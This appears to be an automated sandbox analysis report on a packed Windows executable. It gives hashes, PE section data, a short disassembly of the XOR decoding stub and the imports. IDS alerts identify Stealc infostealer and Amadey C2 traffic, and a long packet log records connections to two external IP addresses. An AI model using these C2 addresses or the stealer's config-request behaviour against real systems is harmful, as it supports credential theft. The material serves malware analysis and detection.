                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:file.exe
                                                                File size:2'544'640 bytes
                                                                MD5:5df47a238d51fdad9b442feb6c833886
                                                                SHA1:9332ec9a71256cfdea81cfbf8627f0a274802b1d
                                                                SHA256:d06e1fd08af8234eb7d356343329905327126518eea8bee8e00f10aeaf7d3a09
                                                                SHA512:8f0e92e9e7f2bc849819fc6e2c6cd332f2da8ef41610107abc34696f27176bb01148c54ef0c6dd1f02642f99bd453b0efc2f5d58055a543706e16f5eb3e75bba
                                                                SSDEEP:49152:fM+AtxmEVG4o6E1MmGcyUB4BmAP0julxkp3tJXpgttFlhTKquE:U+iG4olCms9uUkp3XpgttFlJKqV
                                                                TLSH:93C5332681976BF3E5A61B3BF4D07C73CAFC007004652669D369E1126A2F7C939F929C
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L..
                                                                Icon Hash:90cececece8e8eb0
                                                                Entrypoint:0x1001a94
                                                                Entrypoint Section:.data
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6686E6C8 [Thu Jul 4 18:15:36 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:1
                                                                File Version Major:5
                                                                File Version Minor:1
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:1
                                                                Import Hash:001806c33a6e9fe5fbff34bdbd79b591
                                                                Instruction
                                                                jmp 00007F34D8828CFAh
                                                                add byte ptr [esp+eax], dh
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax-18h], ah
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                pop ebp
                                                                sub ebp, 00000010h
                                                                sub ebp, 00C01A94h
                                                                jmp 00007F34D8828CF9h
                                                                lodsd
                                                                ret
                                                                dec esp
                                                                sar dword ptr [eax+00C01A94h], cl
                                                                add eax, ebp
                                                                add eax, 0000004Ch
                                                                mov ecx, 000005A7h
                                                                mov edx, F4C0D003h
                                                                xor byte ptr [eax], dl
                                                                inc eax
                                                                dec ecx
                                                                jne 00007F34D8828CECh
                                                                jmp 00007F34D8828CF9h
                                                                mov esi, edx
                                                                inc ecx
                                                                mov dh, cl
                                                                mov byte ptr [edx+0303033Fh], cl
                                                                add dl, FFFFFFFBh
                                                                add eax, dword ptr [ebx]
                                                                add eax, dword ptr [eax]
                                                                into
                                                                mov ebx, 03030307h
                                                                mov ecx, 0303032Bh
                                                                hlt
                                                                loope 00007F34D8828CF2h
                                                                retf
                                                                mov byte ptr [edx+0303030Fh], al
                                                                add dh, al
                                                                push ebx
                                                                mov fs, word ptr [edi+27h]
                                                                dec dword ptr [edx+436B2707h]
                                                                and al, 21h
                                                                add ebp, dword ptr [ebx+51h]
                                                                sahf
                                                                add eax, dword ptr [edx]
                                                                das
                                                                daa
                                                                imul eax, dword ptr [edi], 67h
                                                                xlatb
                                                                jmp 00007F34D8828CF8h
                                                                add eax, dword ptr [ebx]
                                                                add ebp, edx
                                                                xor eax, dword ptr [ebx]
                                                                add eax, dword ptr [ebx]
                                                                push esi
                                                                mov gs, word ptr [edi+27h]
                                                                add ecx, dword ptr [eax+03030B86h]
                                                                add ecx, dword ptr [eax+03030F96h]
                                                                add ecx, dword ptr [eax+0303138Eh]
                                                                add eax, edx
                                                                jmp far 07C1h : 80013201h
                                                                dec edx
                                                                or al, 86h
                                                                idiv esp
                                                                cld
                                                                cld
                                                                mov byte ptr [edi], ch
                                                                daa
                                                                mov fs, word ptr [edi+27h]
                                                                pop es
                                                                Programming Language:
                                                                • [C++] VS2010 build 30319
                                                                • [ASM] VS2010 build 30319
                                                                • [ C ] VS2010 build 30319
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [LNK] VS2010 build 30319
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x9dc0200xd87.data
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9dcda80x20c.data
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x9dc0000xc.data
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                0x10000x1b0000xa40000ee81b27115992c3e01c5d846def35aFalse0.9996427210365854data7.995466725480933IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                0x1c0000x80000x40006733042a0ee2b9784f17bfdf61d1c872False0.99188232421875data7.977842582826075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                0x240000x2130000x4007c6b113c75203dd624114c880f41b893unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                0x2370000x50000x200015ac47fb1512de6a4660290d65f17001False0.9896240234375data7.9508605124369IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                0x23c0000x79d0000x32800d564896f0b86fcfa4feb7d95a578a52funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .data0x9d90000x22a0000x22a000f1fafd8c01391e880aa0359392d0207aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                DLLImport
                                                                kernel32.dllGetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                                                                user32.dllMessageBoxA
                                                                advapi32.dllRegCloseKey
                                                                oleaut32.dllSysFreeString
                                                                gdi32.dllCreateFontA
                                                                shell32.dllShellExecuteA
                                                                version.dllGetFileVersionInfoA
                                                                msvcrt.dllstrncpy
                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                07/05/24-04:35:57.847864TCP2044244ET TROJAN Win32/Stealc Requesting browsers Config from C24973080192.168.2.485.28.47.30
                                                                07/05/24-04:35:57.138371TCP2044243ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in4973080192.168.2.485.28.47.30
                                                                07/05/24-04:35:58.030501TCP2051828ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1804973085.28.47.30192.168.2.4
                                                                07/05/24-04:35:58.031752TCP2044246ET TROJAN Win32/Stealc Requesting plugins Config from C24973080192.168.2.485.28.47.30
                                                                07/05/24-04:35:58.217968TCP2051831ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1804973085.28.47.30192.168.2.4
                                                                07/05/24-04:37:02.781207TCP2856147ETPRO TROJAN Amadey CnC Activity M34974480192.168.2.477.91.77.82
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jul 5, 2024 04:35:57.132916927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:57.138114929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:57.138205051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:57.138370991 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:57.143116951 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:57.846409082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:57.846580982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:57.847863913 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:57.852972984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.030500889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.030519009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.030828953 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:58.031752110 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:58.036470890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.217967987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.217984915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.218009949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.218023062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.218040943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.218054056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.218082905 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:58.218116999 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:58.219881058 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:58.224718094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.403156042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.403215885 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:58.422301054 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:58.422334909 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:58.427175999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.427186012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.427217960 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.427285910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.427294016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:58.427429914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.076169014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.076250076 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.339410067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.344367981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.519110918 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.519140005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.519157887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.519181013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.519198895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.519203901 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.519228935 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.519262075 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.519423962 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.519454956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.519471884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.519479990 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.519490004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.519500017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.519522905 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.519531965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.520050049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.520066977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.520082951 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.520100117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.520101070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.520119905 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.520128012 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.520145893 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.601327896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.601346016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.601361990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.601459026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.601471901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.601541042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.601563931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.601579905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.601593971 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.601600885 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.601686954 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.610564947 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.610604048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.610627890 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.610656977 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.610671997 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.610714912 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.610728025 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.610729933 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.610747099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.610759974 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.610771894 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.610791922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.611201048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.611255884 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.611255884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.611274004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.611301899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.611318111 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.611670017 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.611694098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.611710072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.611725092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.611742973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.611748934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.611748934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.611748934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.611776114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.611788988 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.612373114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.612400055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.612418890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.612427950 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.612447977 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.612457037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.612463951 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.612473965 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.612498045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.612500906 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.612544060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.612597942 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.683835983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.683921099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.683947086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.683964014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.683979034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.683981895 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.683995008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.684011936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.684089899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.693000078 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.693047047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.693061113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.693074942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.693092108 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.693098068 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.693212032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.693334103 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.693350077 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.693366051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.693383932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.693401098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.693418980 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.693480968 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.693985939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.694025040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.694040060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.694080114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.694103003 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.694299936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.694314957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.694360971 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.702222109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.702280998 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.702282906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.702332973 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.702428102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.702474117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.702477932 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.702490091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.702517033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.702522039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.702532053 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.702533960 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.702549934 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.702567101 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.702584982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.702593088 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.702641964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.702657938 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.702701092 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.703273058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.703289032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.703305006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.703326941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.703341007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.703341961 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.703353882 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.703385115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.703866005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.703891993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.703907967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.703917980 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.703934908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.703938961 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.703952074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.703952074 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.703970909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.703975916 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.703994036 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.704013109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.704016924 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.704030037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.704073906 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.704819918 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.704835892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.704862118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.704876900 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.704885960 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.704894066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.704906940 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.704910994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.704930067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.704946041 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.778126955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.778156042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.778172970 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.778187990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.778203964 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.778218031 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.778233051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.778234959 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.778254032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.778270960 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.778275967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.778290033 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.778295040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.778312922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.778321028 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.778350115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.778368950 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.778472900 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.778486967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.778521061 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.778532982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.778573990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.778630018 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.778657913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.778700113 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.784840107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.784856081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.784923077 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.784945011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.784960985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.784976006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.785000086 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.785001993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.785017967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.785032034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.785034895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.785073042 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.785084009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.785098076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.785113096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.785128117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.785144091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.785146952 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.785165071 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.785193920 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:35:59.785809040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.785825014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:35:59.785840034 CEST804973085.28.47.30192.168.2.4
